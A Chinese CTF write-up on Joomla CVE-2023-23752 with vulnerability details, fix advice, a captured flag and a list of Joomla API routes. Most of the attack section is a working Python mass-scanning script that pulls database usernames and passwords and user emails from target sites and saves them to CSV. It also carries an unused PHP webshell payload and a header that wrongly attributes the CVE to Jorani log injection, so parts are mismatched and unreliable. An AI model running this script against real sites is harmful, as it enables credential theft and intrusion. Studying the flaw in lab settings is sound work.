【春秋云镜】CVE-2023-23752

目录

  • CVE-2023-23752
    • 漏洞细节
    • 漏洞利用示例
    • 修复建议
  • 春秋云镜:
    • 解法一:
    • 解法二:

CVE-2023-23752

是一个影响 Joomla CMS 的未授权路径遍历漏洞。该漏洞出现在 Joomla 4.0.0 至 4.2.7 版本中,允许未经认证的远程攻击者通过特定 API 端点读取服务器上的敏感文件,包括配置文件等,这可能会导致服务器上的敏感信息泄露和进一步的攻击。

漏洞细节

  • 漏洞编号:CVE-2023-23752
  • 影响版本:Joomla 4.0.0 至 4.2.7
  • 漏洞类型:路径遍历 (Directory Traversal)
  • 访问要求:无需身份验证即可访问
  • 利用条件:通过指定的 API 端点,结合路径遍历参数访问系统文件

攻击者通过利用路径遍历技巧向 Joomla 的 API 端点发送特定请求,可以直接访问和读取 Joomla 服务器的敏感文件,如 configuration.php 文件,其中可能包含数据库凭据、加密密钥等关键信息。

漏洞利用示例

攻击者可以通过如下请求来尝试获取配置文件内容:

GET /api/index.php/v1/config/application?path=../../configuration.php HTTP/1.1
Host: target-site.com

在 path 参数中使用路径遍历(如 …/…/)可绕过文件路径限制并访问 Joomla 安装路径外的文件。通过请求配置文件,攻击者能够获取服务器的数据库连接信息、加密密钥等敏感数据。

修复建议

Joomla 已在 4.2.8 版本中修复了该漏洞。建议用户尽快采取以下措施:

  1. 升级 Joomla 版本:将 Joomla CMS 升级至 4.2.8 或更高版本。
  2. 限制 API 访问:在服务器设置中对 /api/index.php 端点进行访问限制,以避免未经授权的访问。
  3. 启用 Web 应用防火墙(WAF):WAF 可帮助过滤和阻止包含路径遍历特征的恶意请求。

春秋云镜:

Joomla是一个开源免费的内容管理系统(CMS),基于PHP开发。在其4.0.0版本到4.2.7版本中,存在一处属性覆盖漏洞,导致攻击者可以通过恶意请求绕过权限检查,访问任意Rest API。

解法一:

1
直接利用脚本

"""
CVE-2023-23752 利用:Jorani 1.0.0 中的路径遍历与日志注入漏洞
该漏洞允许攻击者通过路径遍历访问日志文件并注入恶意代码,从而执行远程命令。
"""import requests
import argparse
import csv
import json
import datetime
import sys
import re
import base64
import random
import string# 禁用 SSL 不安全请求的警告
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)# 定义日志输出的函数,带有颜色显示
def inGreen(s):return "\033[0;32m{}\033[0m".format(s)def inYellow(s):return "\033[0;33m{}\033[0m".format(s)# 定义日志、错误和消息输出函数
def msg(x, y="\n"):print(f'\x1b[92m[+]\x1b[0m {x}', end=y)def err(x, y="\n"):print(f'\x1b[91m[x]\x1b[0m {x}', end=y)def log(x, y="\n"):print(f'\x1b[93m[?]\x1b[0m {x}', end=y)# 正则表达式,用于提取 CSRF 令牌和命令执行结果
CSRF_PATTERN = re.compile('<input type="hidden" name="csrf_test_jorani" value="(.*?)"')
CMD_PATTERN = re.compile('---------(.*?)---------', re.S)# 定义 API 路径映射
URLS = {'login': '/session/login','view': '/pages/view/',
}# 随机生成一个头字段名,以绕过某些防护机制
HEADER_NAME = ''.join(random.choice(string.ascii_uppercase) for _ in range(12))# 定义用于绕过重定向保护的请求头
BypassRedirect = {'X-REQUESTED-WITH': 'XMLHttpRequest',HEADER_NAME: ""
}# 定义伪终端输入的提示符样式
INPUT = "\x1b[92muser\x1b[0m@\x1b[41mjorani\x1b[0m(PSEUDO-TERM)\n$ "# 简化 URL 构造的函数
u = lambda base_url, path_key: base_url + URLS[path_key]# 注入的恶意 PHP 代码和路径遍历 payload
POISON_PAYLOAD = f"<?php if(isset($_SERVER['HTTP_{HEADER_NAME}'])){{system(base64_decode($_SERVER['HTTP_{HEADER_NAME}']));}} ?>"
PATH_TRAV_PAYLOAD = "../../application/logs"# 全局变量,用于存储输出文件路径、代理设置和是否禁用颜色输出
output = ""
proxy = {}
notColor = False
timeout = 10  # 添加这行,设置请求超时时间为10秒def readFile(filepath):"""读取文件内容,返回每行数据的列表"""try:with open(filepath, encoding='utf8') as file:return file.readlines()except Exception as e:err(f"读取文件失败: {e}")sys.exit(1)def writeFile(filepath, data):"""将数据写入 CSV 文件"""try:with open(filepath, 'a', encoding='utf8', newline='') as file:filecsv = csv.writer(file)filecsv.writerow(data)except Exception as e:err(f"写入文件失败: {e}")def reqDatabase(url):"""请求数据库配置信息,并提取用户名和密码"""# 构造请求 URLif url.endswith("/"):api_url = f"{url}api/index.php/v1/config/application?public=true"else:api_url = f"{url}/api/index.php/v1/config/application?public=true"# 定义请求头headers = {'Upgrade-Insecure-Requests': '1','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9','Accept-Encoding': 'gzip, deflate','Accept-Language': 'zh-CN,zh;q=0.9','Connection': 'close'}try:# 发送 GET 请求response = requests.get(api_url, headers=headers, verify=False, proxies=proxy, timeout=timeout)# 检查响应内容是否包含用户和密码信息if "links" in response.text and "\"password\":" in response.text:try:rejson = response.json()user = ""password = ""for dataone in rejson['data']:attributes = dataone.get('attributes', {})user = attributes.get('user', "")password = attributes.get('password', "")if user or password:printBody = f"[+] [Database]   {url} --> {user} / {password}"if notColor:print(printBody)else:print(inYellow(printBody))if output.strip():writeFile(f"{output}_databaseUserAndPassword.csv", [url, user, password, response.text])return url, response.textexcept json.JSONDecodeError:err("解析 JSON 失败")except requests.RequestException as e:err(f"请求数据库信息失败: {e}")def reqUserAndEmail(url):"""请求用户和邮箱信息,并提取用户名和邮箱"""# 构造请求 URLif url.endswith("/"):api_url = f"{url}api/index.php/v1/users?public=true"else:api_url = f"{url}/api/index.php/v1/users?public=true"# 定义请求头headers = {'Upgrade-Insecure-Requests': '1','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9','Accept-Encoding': 'gzip, deflate','Accept-Language': 'zh-CN,zh;q=0.9','Connection': 'close'}try:# 发送 GET 请求response = requests.get(api_url, headers=headers, verify=False, proxies=proxy, timeout=timeout)# 检查响应内容是否包含用户名和邮箱信息if "username" in response.text and "email" in response.text:try:rejson = response.json()for dataone in rejson['data']:attributes = dataone.get('attributes', {})username = attributes.get('username', "")email = attributes.get('email', "")if username or email:printBody = f"[+] [User&email] {url} --> {username} / {email}"if notColor:print(printBody)else:print(inGreen(printBody))if output.strip():writeFile(f"{output}_usernameAndEmail.csv", [url, username, email, response.text])return url, response.textexcept json.JSONDecodeError:err("解析 JSON 失败")except requests.RequestException as e:err(f"请求用户和邮箱信息失败: {e}")def reqs(listfileName):"""读取 URL 列表并依次执行数据库和用户信息请求"""urls = readFile(listfileName)for url in urls:url = url.strip()if not url:continuereqDatabase(url)reqUserAndEmail(url)def main():"""主函数,解析命令行参数并执行相应操作"""parser = argparse.ArgumentParser(description="Jorani 1.0.0 CVE-2023-23752 漏洞利用脚本")parser.add_argument('-u', '--url', type=str, default="", help="单个测试目标的 URL")parser.add_argument('-l', '--listfile', type=str, default="", help="包含测试目标 URL 的文件")parser.add_argument('-o', '--output', type=str, default="", help="输出文件的位置(不带扩展名)")parser.add_argument('-p', '--proxy', type=str, default="", help="代理地址,例如:http://localhost:1080")parser.add_argument('-nc', '--notColor', action='store_true', help="禁用带颜色的输出")opt = parser.parse_args()args = vars(opt)url = args['url']urlFileName = args['listfile']global output, proxy, notColoroutput = args['output']if args['proxy']:proxy['http'] = args['proxy']proxy['https'] = args['proxy']notColor = args['notColor']if url:reqDatabase(url)reqUserAndEmail(url)if urlFileName:reqs(urlFileName)if __name__ == '__main__':main()

1

flag{631f8b58-cbda-473d-a969-5160c11977be}

解法二:

其本身可利用的api接口

v1/banners
v1/banners/:id
v1/banners
v1/banners/:id
v1/banners/:id
v1/banners/clients
v1/banners/clients/:id
v1/banners/clients
v1/banners/clients/:id
v1/banners/clients/:id
v1/banners/categories
v1/banners/categories/:id
v1/banners/categories
v1/banners/categories/:id
v1/banners/categories/:id
v1/banners/:id/contenthistory
v1/banners/:id/contenthistory/keep
v1/banners/:id/contenthistory
v1/config/application
v1/config/application
v1/config/:component_name
v1/config/:component_name
v1/contacts/form/:id
v1/contacts
v1/contacts/:id
v1/contacts
v1/contacts/:id
v1/contacts/:id
v1/contacts/categories
v1/contacts/categories/:id
v1/contacts/categories
v1/contacts/categories/:id
v1/contacts/categories/:id
v1/fields/contacts/contact
v1/fields/contacts/contact/:id
v1/fields/contacts/contact
v1/fields/contacts/contact/:id
v1/fields/contacts/contact/:id
v1/fields/contacts/mail
v1/fields/contacts/mail/:id
v1/fields/contacts/mail
v1/fields/contacts/mail/:id
v1/fields/contacts/mail/:id
v1/fields/contacts/categories
v1/fields/contacts/categories/:id
v1/fields/contacts/categories
v1/fields/contacts/categories/:id
v1/fields/contacts/categories/:id
v1/fields/groups/contacts/contact
v1/fields/groups/contacts/contact/:id
v1/fields/groups/contacts/contact
v1/fields/groups/contacts/contact/:id
v1/fields/groups/contacts/contact/:id
v1/fields/groups/contacts/mail
v1/fields/groups/contacts/mail/:id
v1/fields/groups/contacts/mail
v1/fields/groups/contacts/mail/:id
v1/fields/groups/contacts/mail/:id
v1/fields/groups/contacts/categories
v1/fields/groups/contacts/categories/:id
v1/fields/groups/contacts/categories
v1/fields/groups/contacts/categories/:id
v1/fields/groups/contacts/categories/:id
v1/contacts/:id/contenthistory
v1/contacts/:id/contenthistory/keep
v1/contacts/:id/contenthistory
v1/content/articles
v1/content/articles/:id
v1/content/articles
v1/content/articles/:id
v1/content/articles/:id
v1/content/categories
v1/content/categories/:id
v1/content/categories
v1/content/categories/:id
v1/content/categories/:id
v1/fields/content/articles
v1/fields/content/articles/:id
v1/fields/content/articles
v1/fields/content/articles/:id
v1/fields/content/articles/:id
v1/fields/content/categories
v1/fields/content/categories/:id
v1/fields/content/categories
v1/fields/content/categories/:id
v1/fields/content/categories/:id
v1/fields/groups/content/articles
v1/fields/groups/content/articles/:id
v1/fields/groups/content/articles
v1/fields/groups/content/articles/:id
v1/fields/groups/content/articles/:id
v1/fields/groups/content/categories
v1/fields/groups/content/categories/:id
v1/fields/groups/content/categories
v1/fields/groups/content/categories/:id
v1/fields/groups/content/categories/:id
v1/content/articles/:id/contenthistory
v1/content/articles/:id/contenthistory/keep
v1/content/articles/:id/contenthistory
v1/extensions
v1/languages/content
v1/languages/content/:id
v1/languages/content
v1/languages/content/:id
v1/languages/content/:id
v1/languages/overrides/search
v1/languages/overrides/search/cache/refresh
v1/languages/overrides/site/zh-CN
v1/languages/overrides/site/zh-CN/:id
v1/languages/overrides/site/zh-CN
v1/languages/overrides/site/zh-CN/:id
v1/languages/overrides/site/zh-CN/:id
v1/languages/overrides/administrator/zh-CN
v1/languages/overrides/administrator/zh-CN/:id
v1/languages/overrides/administrator/zh-CN
v1/languages/overrides/administrator/zh-CN/:id
v1/languages/overrides/administrator/zh-CN/:id
v1/languages/overrides/site/en-GB
v1/languages/overrides/site/en-GB/:id
v1/languages/overrides/site/en-GB
v1/languages/overrides/site/en-GB/:id
v1/languages/overrides/site/en-GB/:id
v1/languages/overrides/administrator/en-GB
v1/languages/overrides/administrator/en-GB/:id
v1/languages/overrides/administrator/en-GB
v1/languages/overrides/administrator/en-GB/:id
v1/languages/overrides/administrator/en-GB/:id
v1/languages
v1/languages
v1/media/adapters
v1/media/adapters/:id
v1/media/files
v1/media/files/:path/
v1/media/files/:path
v1/media/files
v1/media/files/:path
v1/media/files/:path
v1/menus/site
v1/menus/site/:id
v1/menus/site
v1/menus/site/:id
v1/menus/site/:id
v1/menus/administrator
v1/menus/administrator/:id
v1/menus/administrator
v1/menus/administrator/:id
v1/menus/administrator/:id
v1/menus/site/items
v1/menus/site/items/:id
v1/menus/site/items
v1/menus/site/items/:id
v1/menus/site/items/:id
v1/menus/administrator/items
v1/menus/administrator/items/:id
v1/menus/administrator/items
v1/menus/administrator/items/:id
v1/menus/administrator/items/:id
v1/menus/site/items/types
v1/menus/administrator/items/types
v1/messages
v1/messages/:id
v1/messages
v1/messages/:id
v1/messages/:id
v1/modules/types/site
v1/modules/types/administrator
v1/modules/site
v1/modules/site/:id
v1/modules/site
v1/modules/site/:id
v1/modules/site/:id
v1/modules/administrator
v1/modules/administrator/:id
v1/modules/administrator
v1/modules/administrator/:id
v1/modules/administrator/:id
v1/newsfeeds/feeds
v1/newsfeeds/feeds/:id
v1/newsfeeds/feeds
v1/newsfeeds/feeds/:id
v1/newsfeeds/feeds/:id
v1/newsfeeds/categories
v1/newsfeeds/categories/:id
v1/newsfeeds/categories
v1/newsfeeds/categories/:id
v1/newsfeeds/categories/:id
v1/plugins
v1/plugins/:id
v1/plugins/:id
v1/privacy/requests
v1/privacy/requests/:id
v1/privacy/requests/export/:id
v1/privacy/requests
v1/privacy/consents
v1/privacy/consents/:id
v1/privacy/consents/:id
v1/redirects
v1/redirects/:id
v1/redirects
v1/redirects/:id
v1/redirects/:id
v1/tags
v1/tags/:id
v1/tags
v1/tags/:id
v1/tags/:id
v1/templates/styles/site
v1/templates/styles/site/:id
v1/templates/styles/site
v1/templates/styles/site/:id
v1/templates/styles/site/:id
v1/templates/styles/administrator
v1/templates/styles/administrator/:id
v1/templates/styles/administrator
v1/templates/styles/administrator/:id
v1/templates/styles/administrator/:id
v1/users
v1/users/:id
v1/users
v1/users/:id
v1/users/:id
v1/fields/users
v1/fields/users/:id
v1/fields/users
v1/fields/users/:id
v1/fields/users/:id
v1/fields/groups/users
v1/fields/groups/users/:id
v1/fields/groups/users
v1/fields/groups/users/:id
v1/fields/groups/users/:id
v1/users/groups
v1/users/groups/:id
v1/users/groups
v1/users/groups/:id
v1/users/groups/:id
v1/users/levels
v1/users/levels/:id
v1/users/levels
v1/users/levels/:id
v1/users/levels/:id
/api/index.php/v1/config/application?public=true

这里存在的是数据库信息,没有看到有flag
在这里插入图片描述

/api/index.php/v1/users?public=true

查看用户信息,找到flag
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/58243.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

解决虚拟机启动报:此主机支持AMD-V,但AMD-V处于禁用状态

首先要知道你自己使用的主板型号&#xff0c;如果是京东购买的&#xff0c;可以直接上京东去问客服。如果没有订单号&#xff0c;如果能提供正确的主板型号&#xff0c;他们应该也是会帮忙解答的。 您好&#xff0c;AMD 平台与 Intel 平台以及部分新老主板开启虚拟化的步骤和细…

【EI会议推荐】抢先掌握学术前沿!快来参加EI学术会议投稿,展示你的研究成果,开启科研新高度!

【EI会议推荐】抢先掌握学术前沿&#xff01;快来参加EI学术会议投稿&#xff0c;展示你的研究成果&#xff0c;开启科研新高度&#xff01; 【EI会议推荐】抢先掌握学术前沿&#xff01;快来参加EI学术会议投稿&#xff0c;展示你的研究成果&#xff0c;开启科研新高度&#…

2.若依vue表格数据根据不同状态显示不同颜色style

例如国标显示蓝色&#xff0c;超标是红色 使用是蓝色&#xff0c;未使用是绿色 <el-table-column label"外卖配送是否完成评价" align"center" prop"isOverFlag"> <template slot-scope"scope"> …

Java基础-内部类与异常处理

(创作不易&#xff0c;感谢有你&#xff0c;你的支持&#xff0c;就是我前行的最大动力&#xff0c;如果看完对你有帮助&#xff0c;请留下您的足迹&#xff09; 目录 一、Java 内部类 什么是内部类&#xff1f; 使用内部类的优点 访问局部变量的限制 内部类和继承 内部…

Java 基于SpringBoot+Vue 的公交智能化系统,附源码、文档

博主介绍&#xff1a;✌程序员徐师兄、7年大厂程序员经历。全网粉丝12w、csdn博客专家、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域和毕业项目实战✌ &#x1f345;文末获取源码联系&#x1f345; &#x1f447;&#x1f3fb; 精彩专栏推荐订阅&#x1f447;…

Spring Boot开发入门教程

简介 Spring Boot是一个开源的Java基础框架&#xff0c;用于创建独立、生产级的基于Spring框架的应用程序。通过Spring Boot&#xff0c;你可以轻松地创建独立的、生产级的Spring应用程序。 环境准备 Java开发环境&#xff1a;确保你的机器上安装了Java 8或更高版本。Maven…

科技资讯|谷歌Play应用商店有望支持 XR 头显,AR / VR设备有望得到发展

据 Android Authority 报道&#xff0c;谷歌似乎正在为其 Play 商店增加对 XR 头显的支持。该媒体在 Play 商店的代码中发现了相关的线索&#xff0c;包括一个代表头显的小图标以及对“XR 头显”的提及。 谷歌也可能改变了此前拒绝将 Play 商店引入 Meta Quest 头显的决定。今…

使用Python Flask实战构建Web应用

你是否曾想过&#xff0c;使用Python来快速搭建一个Web应用&#xff1f;Flask作为一个轻量级的Web框架&#xff0c;因其简单、灵活且高效&#xff0c;成为了很多开发者首选的工具。今天&#xff0c;就让我们一同走进Flask的世界&#xff0c;探索如何使用它轻松构建一个实战Web应…

map和set和pair

目录 一.序列式容器和关联式容器 一.set set类的介绍&#xff1a; Construct &#xff1a;set的初始化 insert&#xff1a;插入 ​编辑find&#xff1a;查找 erase&#xff1a;删除 set查找范围的函数&#xff1a;​编辑 二.map 2.1map介绍 2.2pair类型介绍 在map的i…

GA/T1400视图库平台EasyCVR视频分析设备平台微信H5小程序:智能视频监控的新篇章

GA/T1400视图库平台EasyCVR是一款综合性的视频管理工具&#xff0c;它兼容Windows、Linux&#xff08;包括CentOS和Ubuntu&#xff09;以及国产操作系统。这个平台不仅能够接入多种协议&#xff0c;还能将不同格式的视频数据统一转换为标准化的视频流&#xff0c;通过无需插件的…

HCIP(7)-边界网关协议BGP基本配置(对等体peer,宣告network,引入import)

边界网关协议&#xff08;Border Gateway Protocol&#xff0c;BGP&#xff09;是一种用来在路由选择域之间交换网络层可达性信息&#xff08;Network Layer Reachability Information&#xff0c;NLRI&#xff09;的路由选择协议。由于不同的管理机构分别控制着他们各自的路由…

GODOT 4 不用scons编译cpp扩展的方法

以terrain3d插件&#xff0c;Godot_v4.3 为例&#xff1a; 下载下来&#xff0c;先用scons编译一遍通过后&#xff0c;整个占用1GB&#xff0c;obj文件都生成在源码旁边&#xff0c;够乱。 scons 是跨平台的构建工具&#xff0c;但是需要需要写python脚本。流程比较莫名其妙…

KVM虚拟机的冷热迁移

首先了解在KVM&#xff08;Kernel-based Virtual Machine&#xff09;环境中&#xff0c;冷热迁移是指将虚拟机从一台主机迁移到另一台主机的过程&#xff0c;根据虚拟机是否需要停机&#xff0c;迁移分为热迁移和冷迁移&#xff1a; 冷迁移&#xff08;Cold Migration&#x…

AIGC时代LaTeX排版的应用、技巧与未来展望

文章目录 一、LaTeX简介与基础设置二、常用特殊符号与公式排版三、图片与表格的插入与排版四、自动编号与交叉引用五、自定义命令与样式六、LaTeX在AIGC时代的应用与挑战七、LaTeX的未来展望《LaTeX 入门实战》内容简介作者简介目录前言/序言读者对象本书内容充分利用本书 在AI…

Ansible 部署应用

Ansible Ansible 是基于 Python 开发&#xff0c;集合了众多优秀运维工具的优点&#xff0c;实现了批量运行命令、部署程序、配置系统等功能的自动化运维管理工具。默认通过 SSH 协议进行远程命令执行或下发配置&#xff0c;无需部署任何客户端代理软件&#xff0c;从而使得自动…

基于SpringBoot+Gpt个人健康管家管理系统【提供源码+答辩PPT+参考文档+项目部署】

作者简介&#xff1a;✌CSDN新星计划导师、Java领域优质创作者、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域和学生毕业项目实战,高校老师/讲师/同行前辈交流。✌ 主要内容&#xff1a;&#x1f31f;Java项目、Python项目、前端项目、PHP、ASP.NET、人工智能…

React中常用的hook函数(三)——useReducer和useContext

React中常用的hook函数(一)——useState和useEffect_usestate useeffect-CSDN博客https://blog.csdn.net/Mrs_Lupin/article/details/142905749?sharetypeblogdetail&sharerId142905749&sharereferPC&sharesourceMrs_Lupin&spm1011.2480.3001.8118React中常用…

Android问题 -- DJ多多的下载文件在哪里? DJ多多dat格式转换为mp3

目的 想要将安卓 DJ多多 应用所下载的歌曲文件转换为 mp3 格式, 以便于传输到手表上进行播放 (健身跑步用) 但是找不到在安卓手机中DJ多多的下载的文件路径 文件路径 使用 ES文件浏览器 查看, 自带文件管理器一般查不到 文件路径: 内部存储/Android/data/com.shoujiduoduo.…